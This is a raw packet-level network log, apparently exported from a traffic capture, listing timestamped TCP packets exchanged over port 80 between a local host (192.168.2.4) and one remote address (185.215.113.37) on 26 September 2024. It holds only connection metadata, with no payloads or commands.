Sep 26, 2024 18:27:12.127878904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.127888918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.127922058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.127954006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.212178946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212275028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212330103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212330103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.212330103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.212346077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212361097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212373972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212380886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.212388039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212393999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212398052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212404013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212405920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.212409973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212420940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212430954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212447882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212455988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.212460041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212466955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212477922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.212507010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.212594032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212605000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212615013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212625980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212636948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212639093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.212642908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212658882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212661982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.212706089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.212748051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.212908030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212918997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212929010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212939978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212949991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212950945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.212960958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212973118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212984085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.212997913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.213001013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213013887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213033915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.213058949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.213193893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213243008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.213247061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213263035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213274956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213284016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213289976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.213310957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.213330984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.213414907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213428020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213438034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213448048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213457108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213469028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213481903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.213501930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.213526964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.213711023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213721991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213732004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213742971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213752985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213757992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213768005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213778019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213784933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.213788986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213799953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213808060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.213812113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213824034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.213861942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.213892937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.214108944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214119911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214129925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214150906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.214194059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.214250088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214262009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214271069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214283943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214293957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214296103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.214312077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214333057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.214359999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.214503050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214518070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214528084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214539051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214549065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214554071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.214560032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214571953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214586020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.214629889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.214806080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214818001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214827061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214837074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214842081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214847088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214853048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.214857101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214874029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214885950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214886904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.214898109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214907885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214912891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.214919090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214930058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214939117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214947939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.214948893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214966059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214977026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.214982033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.215003014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.215023041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.215523005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.215536118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.215544939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.215554953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.215564966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.215569019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.215576887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.215588093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.215594053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.215600967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.215610981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.215620995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.215631962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.215631962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.215658903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.215678930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.215862989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.215874910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.215908051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.215919971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.216012001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.216023922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.216033936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.216044903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.216053963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.216056108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.216068029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.216078997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.216078997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.216093063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.216103077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.216119051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.216124058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.216130972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.216142893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.216157913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.216182947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.306953907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.306992054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307003975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307030916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307041883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307053089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307064056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307085991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.307147980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.307320118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307332039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307342052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307352066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307363033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307373047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.307374001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307394028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307404041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.307414055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307421923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.307425976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307451963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.307471991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.307838917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307849884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307861090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307872057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307883024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307893038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307898998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.307904959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307924032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307926893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.307935953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307946920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307950020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.307960033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307971001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307972908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.307976961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307987928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307993889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.307996035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.308005095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308016062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308028936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.308031082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308058023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.308077097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.308237076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308299065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.308442116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308453083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308470011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308480978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308486938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308490038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.308497906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308506012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.308510065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308523893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308533907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308540106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308543921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.308549881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308566093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.308571100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308583021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308593988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308598042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.308605909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308615923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308619022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.308626890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308639050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308655024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.308689117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.308706045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.308971882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.308981895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.309037924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.410285950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.422748089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.656104088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.656166077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.656200886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.656233072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.656282902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.656299114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.656316042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.656342983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.656353951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.656393051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.656409979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.656508923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.656542063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.656563997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.656590939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.656593084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.656624079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.656641960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.656656981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.656672001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.656691074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.656707048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.656737089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.656743050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.656776905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.656795025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.656810999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.656821966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.656858921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.656933069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.656968117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.656991005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.657005072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.657021046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.657038927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.657051086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.657072067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.657084942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.657105923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.657135010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.657139063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.657170057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.657176018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.657191038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.657203913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.657222033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.657237053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.657269955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.657269955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.657293081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.657303095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.657320976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.657335997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.657350063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.657366991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.657382965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.657401085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.657417059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.657433987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.657454014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.657464981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.657478094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.657497883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.657510996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.657537937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.657568932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.657589912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658168077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658200979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658221960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658233881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658246040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658266068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658298969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658299923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658324003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658350945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658382893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658391953 CEST	49730	80	192.168.2.4	185.215.113.37
